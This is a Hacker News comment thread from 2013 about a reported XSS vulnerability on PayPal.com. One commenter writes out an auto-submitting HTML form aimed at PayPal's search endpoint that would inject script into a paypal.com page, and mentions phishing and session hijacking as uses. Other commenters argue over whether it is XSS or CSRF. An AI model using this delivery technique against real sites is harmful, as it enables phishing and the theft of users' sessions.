Basically you need to put something like this on a page you control (where "xss ... | Hacker News

Hacker Newsnew | past | comments | ask | show | jobs | submit

		pfg on May 26, 2013 \| parent \| context \| favorite \| on: PayPal.com XSS Vulnerability Basically you need to put something like this on a page you control (where "xss code" is the code triggering the XSS): `<form action="https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search" method="post"> <input type="text" name="queryString" value="xss code" /> </form>` Then, just as the page loads, submit that form and you're executing JS on a paypal.com page. This would work great for phishing or session hijacking.

hidden-markov on May 26, 2013 [–]

Isn't this CSRF?

unfed on May 26, 2013 | [–]

Combination of XSS and CSRF.

benregenspan on May 26, 2013 | | [–]

This seems like it's just plain XSS - it doesn't take advantage of a user's serverside session to forge an action on their behalf.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact